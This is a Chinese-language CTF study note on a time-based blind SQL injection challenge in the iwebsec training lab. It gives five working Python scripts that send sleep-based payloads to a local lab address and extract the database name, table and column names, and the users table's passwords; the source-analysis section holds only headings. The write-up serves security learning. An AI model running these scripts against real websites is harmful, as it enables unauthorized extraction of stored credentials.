CTF学习笔记6:iwebsec-SQL注入漏洞-03-sleep注入

目录

一、解题过程

(一)观察页面

发现不论输入的payload正确与否,页面输出是一样的,所以不能bool注入

(二)编写脚本逐项获取数据

1.获取数据库名的长度(可不做)

#encoding=utf-8
import requests
import os
import time

url="http://192.168.182.130:8001/sqli/04.php"

def DbLen():
	for i in range(1,10):
		payload="?id=if(length(database())={},sleep(1),1)--+".format(i)
		req_url=url+payload
		start_time=time.time()
		rep=requests.get(url=req_url)
		end_time = time.time()
		t = end_time - start_time
		if t > 1:
			print("DB length is "+str(i))
DbLen()

CTF学习笔记6:iwebsec-SQL注入漏洞-03-sleep注入

2.获取数据库名(可不做)

def DbName():
	result=""
	for i in range(1,8):
		l = 32
		r = 130
		mid = (l + r) >> 1
		while (l < r):
			payload="?id=if(ord(mid((select database()),{},1))>{},sleep(1),1) --+".format(i,mid)
			req_url=url+payload
			#print(req_url)
			start_time=time.time()
			rep=requests.get(url=req_url)
			end_time = time.time()
			t = end_time - start_time
			if t > 1:
				l = mid +1
			else:
				r = mid
			mid = (l + r)>>1
		result=result+chr(mid)
		print("the result is {}".format(result))
DbName()

CTF学习笔记6:iwebsec-SQL注入漏洞-03-sleep注入

3.获取表名

def TablesName():
	result=""
	for i in range(1,50):
		l = 32
		r = 130
		mid = (l + r) >> 1
		while (l < r):
			payload='''?id=if(ord(mid((select group_concat(table_name) 
			from information_schema.tables where table_schema=database()),{},1))>{},sleep(1),1) --+'''.format(i,mid)
			req_url=url+payload
			#print(req_url)
			start_time=time.time()
			rep=requests.get(url=req_url)
			end_time = time.time()
			t = end_time - start_time
			if t > 1:
				l = mid +1
			else:
				r = mid
			mid = (l + r)>>1
		result=result+chr(mid)
		print("the result is {}".format(result))
TablesName()

CTF学习笔记6:iwebsec-SQL注入漏洞-03-sleep注入

4.获取users表的列名

def ColumnsName():
	result=""
	for i in range(1,30):
		l = 32
		r = 130
		mid = (l + r) >> 1
		while (l < r):
			payload='''?id=if(ord(mid((select group_concat(column_name) 
				from information_schema.columns where table_schema=database() and table_name='users'),{},1))>{},sleep(1),1) --+'''.format(i,mid)			
			req_url=url+payload
			#print(req_url)
			start_time=time.time()
			rep=requests.get(url=req_url)
			end_time = time.time()
			t = end_time - start_time
			if t > 1:
				l = mid +1
			else:
				r = mid
			mid = (l + r)>>1
		result=result+chr(mid)
		print("the result is {}".format(result))
ColumnsName()

CTF学习笔记6:iwebsec-SQL注入漏洞-03-sleep注入

5.获取password列的数据

def GetData():
	result=""
	for i in range(1,50):
		l = 32
		r = 130
		mid = (l + r) >> 1
		while (l < r):
			payload="?id=if(ord(mid((select group_concat(password) from iwebsec.users),{},1))>{},sleep(1),1) --+".format(i,mid)			
			req_url=url+payload
			#print(req_url)
			start_time=time.time()
			rep=requests.get(url=req_url)
			end_time = time.time()
			t = end_time - start_time
			if t > 1:
				l = mid +1
			else:
				r = mid
			mid = (l + r)>>1
		result=result+chr(mid)
		print("the result is {}".format(result))
GetData()

CTF学习笔记6:iwebsec-SQL注入漏洞-03-sleep注入

二、源码分析

(一)php源码

CTF学习笔记6:iwebsec-SQL注入漏洞-03-sleep注入

关键脚本

CTF学习笔记6:iwebsec-SQL注入漏洞-03-sleep注入

上一篇:[ACTF2020 新生赛]BackupFile_WriteUp


下一篇:合天网安 在线实验 CTF竞赛 writeup(第七周 | 再见上传、第八周 | 随意的上传、第十三周 | simple xxe、第十五周 | 回显的SSRF)